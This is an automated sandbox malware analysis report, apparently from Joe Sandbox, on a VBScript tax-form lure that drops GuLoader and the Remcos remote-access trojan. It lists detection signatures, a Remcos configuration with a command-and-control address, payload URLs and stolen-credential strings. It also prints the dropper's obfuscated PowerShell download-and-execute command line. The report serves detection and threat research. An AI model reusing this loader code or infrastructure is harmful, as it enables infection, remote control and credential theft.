Windows Analysis Report
Custom Export Tax Recovery Form.vbs

Overview

General Information

Sample name: Custom Export Tax Recovery Form.vbs
Analysis ID: 1533044
MD5: 36ffacaa0e821c2912bed0735361e00a
SHA1: c079a264f1b14321464ebe3d4d623768432f0b22
SHA256: 35950af50b6f5b0a6d108fbac7d8e4dedc6b09b07b4a79c1daa77486254bd7c4
Tags: vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

barindex
Source: 00000009.00000002.3406381912.0000000007BCD000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "154.216.18.65:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UXHRJ7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: ln6b9.shop Virustotal: Detection: 13% Perma Link
Source: http://ln6b9.shop/OxvwnGPq/OGaqsWdpjAA232.bin Virustotal: Detection: 14% Perma Link
Source: http://ln6b9.shop/amykhRcM/Redobling.psd Virustotal: Detection: 14% Perma Link
Source: http://ln6b9.shop Virustotal: Detection: 13% Perma Link
Source: Yara match File source: 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3406381912.0000000007BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 6448, type: MEMORYSTR
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.5% probability
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2477154181.00000000079A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2477154181.00000000079CC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb source: powershell.exe, 00000004.00000002.2447632950.00000000033DE000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_235910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 9_2_235910F1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_23596580 FindFirstFileExA, 9_2_23596580
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0040AE51 FindFirstFileW,FindNextFileW, 12_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 13_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407898

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49928 -> 154.216.18.65:2404
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49939 -> 154.216.18.65:2404
Source: Malware configuration extractor URLs: 154.216.18.65
Source: global traffic TCP traffic: 192.168.2.6:49928 -> 154.216.18.65:2404
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49945 -> 178.237.33.50:80
Source: global traffic HTTP traffic detected: GET /amykhRcM/Redobling.psd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ln6b9.shopConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.65
Source: global traffic HTTP traffic detected: GET /amykhRcM/Redobling.psd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ln6b9.shopConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /OxvwnGPq/OGaqsWdpjAA232.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ln6b9.shopCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: msiexec.exe, 00000009.00000002.3418548340.0000000023560000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000009.00000002.3418729616.00000000239E0000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000009.00000002.3418729616.00000000239E0000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: ln6b9.shop
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2140785929.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2140092051.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139577582.0000022327A8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2140785929.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2140092051.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139577582.0000022327A8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2140785929.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2140092051.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139577582.0000022327A8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: wscript.exe, 00000000.00000003.2124657554.00000223299DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2124657554.00000223299DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000002.2140785929.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2140092051.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139577582.0000022327A8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.2140785929.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2140092051.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139577582.0000022327A8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/eny
Source: wscript.exe, 00000000.00000003.2124542532.0000022327AFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?47ca4706dc
Source: msiexec.exe, 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2595621774.0000000007C09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: msiexec.exe, 00000009.00000003.2595621774.0000000007C09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gphy
Source: msiexec.exe, 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gps
Source: powershell.exe, 00000002.00000002.2253827455.000001DB4A986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2253827455.000001DB4C444000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2253827455.000001DB4C4F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop
Source: msiexec.exe, 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3407261487.0000000007ED0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/OxvwnGPq/OGaqsWdpjAA232.bin
Source: powershell.exe, 00000002.00000002.2253827455.000001DB4A986000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/amykhRcM/Redobling.psdP
Source: powershell.exe, 00000004.00000002.2450890121.0000000005048000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/amykhRcM/Redobling.psdXR
Source: powershell.exe, 00000002.00000002.2280629575.000001DB5A7CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: wscript.exe, 00000000.00000003.2115614300.0000022327AE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2140785929.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2140092051.0000022327A9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139577582.0000022327A8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000004.00000002.2450890121.0000000005048000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2253827455.000001DB4A761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2450890121.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2450890121.0000000005048000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe String found in binary or memory: http://www.ebuddy.com
Source: msiexec.exe String found in binary or memory: http://www.imvu.com
Source: msiexec.exe, 00000009.00000002.3418548340.0000000023560000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: msiexec.exe, 00000009.00000002.3418548340.0000000023560000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: msiexec.exe String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000002.00000002.2253827455.000001DB4A761000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2450890121.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2450890121.0000000005048000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2253827455.000001DB4B31A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: msiexec.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000002.00000002.2280629575.000001DB5A7CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe String found in binary or memory: https://www.google.com
Source: msiexec.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0041183A OpenClipboard,GetLastError, 12_2_0041183A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 12_2_0040987A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 12_2_004098E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 13_2_00406DFC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 13_2_00406E9F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 14_2_004068B5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 14_2_004072B5

E-Banking Fraud

barindex
Source: Yara match File source: 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3406381912.0000000007BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 6448, type: MEMORYSTR

System Summary

barindex
Source: Initial file: Call Pluricipital.ShellExecute(Zoophytography165, Chr(34) & Faire182 & Chr(34), "", "", Balloteres)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b 